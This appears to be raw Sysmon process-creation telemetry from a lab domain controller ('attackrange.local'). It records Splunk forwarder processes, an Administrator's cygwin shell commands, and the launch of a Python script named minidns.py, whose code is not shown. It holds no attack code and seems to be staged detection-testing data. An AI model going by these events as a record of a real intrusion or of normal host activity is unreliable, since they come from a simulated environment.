AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062056Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:17.536{A8622C2F-55F1-6078-380D-00000000AE01}5008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000062046Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:16.860{A8622C2F-55F0-6078-370D-00000000AE01}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000062036Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:04:16.250{A8622C2F-55F0-6078-360D-00000000AE01}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061826Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:22.717{A8622C2F-55BA-6078-350D-00000000AE01}5416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061808Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:20.516{A8622C2F-55B8-6078-340D-00000000AE01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061798Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:19.845{A8622C2F-55B7-6078-330D-00000000AE01}6720C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061788Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:19.264{A8622C2F-55B7-6078-320D-00000000AE01}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061764Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:03:17.358{A8622C2F-55B5-6078-310D-00000000AE01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061754Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:16.861{A8622C2F-55B4-6078-300D-00000000AE01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061744Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:16.246{A8622C2F-55B4-6078-2F0D-00000000AE01}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061724Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:03:14.488{A8622C2F-55B2-6078-2E0D-00000000AE01}7052C:\Program Files\Notepad++\notepad++.exe7.95Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\temp\minidns.py"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=45833E3CFFD3716546665DCE0C343F2E,SHA256=5AEC02154C9A23F5D77B11853691449063AA0EF3988C4EB30048DEBBCEC8B947,IMPHASH=DE4B8987D5ADB218127887FA4130E9E8{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000061654Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:53.134{A8622C2F-559D-6078-2D0D-00000000AE01}3916C:\cygwin64\bin\hostname.exe-----hostname -I C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-559D-6078-2C0D-00000000AE01}4268C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | awk '{print $1}'" 154100x800000000000000061646Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:53.126{A8622C2F-559D-6078-2C0D-00000000AE01}4268C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname 
-I | awk '{print $1}'"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-559D-6078-2B0D-00000000AE01}4788C:\Python27\python.exeC:\Python27\python.exe minidns.py 154100x800000000000000061636Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:53.057{A8622C2F-559D-6078-2B0D-00000000AE01}4788C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-559D-6078-2A0D-00000000AE01}6492C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061617Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:53.046{A8622C2F-559D-6078-2A0D-00000000AE01}6492C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061495Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:31.287{A8622C2F-5587-6078-290D-00000000AE01}5304C:\Python27\python.exe-----C:\Python27\python.exe c:tempminidns.pyC:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5587-6078-280D-00000000AE01}1332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 
154100x800000000000000061476Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:31.277{A8622C2F-5587-6078-280D-00000000AE01}1332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061441Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:22.715{A8622C2F-557E-6078-270D-00000000AE01}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061428Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:22.230{A8622C2F-557E-6078-260D-00000000AE01}6696C:\Python27\python.exe-----C:\Python27\python.exe --versionC:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-557E-6078-250D-00000000AE01}5860C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:02:22.200{A8622C2F-557E-6078-250D-00000000AE01}5860C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061394Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:20.838{A8622C2F-557C-6078-240D-00000000AE01}2424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061384Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:20.061{A8622C2F-557C-6078-230D-00000000AE01}5952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000061373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:19.395{A8622C2F-557B-6078-220D-00000000AE01}3868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061354Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:18.335{A8622C2F-557A-6078-210D-00000000AE01}5444C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-557A-6078-200D-00000000AE01}2132C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061336Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:18.326{A8622C2F-557A-6078-200D-00000000AE01}2132C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061328Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:17.772{A8622C2F-5579-6078-1F0D-00000000AE01}2488C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061318Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:17.101{A8622C2F-5579-6078-1E0D-00000000AE01}2104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:16.279{A8622C2F-5578-6078-1D0D-00000000AE01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000061246Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.098{A8622C2F-556B-6078-1C0D-00000000AE01}4220C:\cygwin64\bin\tzset.exe-----"C:\cygwin64\bin\tzset.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9A334E31142D616401445D77D38B145A,SHA256=3D76C166E2D05B23A6E164B1F9C251C771AEF4E423B00C2EBE4080682C93C243,IMPHASH=36078269731E740E482547ADAAC73406{A8622C2F-556B-6078-1B0D-00000000AE01}5344C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061236Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.089{A8622C2F-556B-6078-1B0D-00000000AE01}5344C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556B-6078-1A0D-00000000AE01}1736C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061225Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:02:03.081{A8622C2F-556B-6078-1A0D-00000000AE01}1736C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.064{A8622C2F-556B-6078-190D-00000000AE01}4056C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-556B-6078-180D-00000000AE01}6364C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061203Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.056{A8622C2F-556B-6078-180D-00000000AE01}6364C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556B-6078-170D-00000000AE01}6852C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061193Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:02:03.047{A8622C2F-556B-6078-170D-00000000AE01}6852C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061180Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.034{A8622C2F-556B-6078-160D-00000000AE01}6460C:\cygwin64\bin\id.exe-----"C:\cygwin64\bin\id.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=5800D64A2799F3182F90A7DBC34B5B1D,SHA256=0B939F24A18CBAF7C8FBBF8A8AE4F474CBDF61BD54870D687A584DA4B29E1FD3,IMPHASH=7D3F9B4155D2A624AD839B9C7F2F075A{A8622C2F-556B-6078-150D-00000000AE01}2408C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061170Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:03.025{A8622C2F-556B-6078-150D-00000000AE01}2408C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556B-6078-140D-00000000AE01}3008C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061160Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
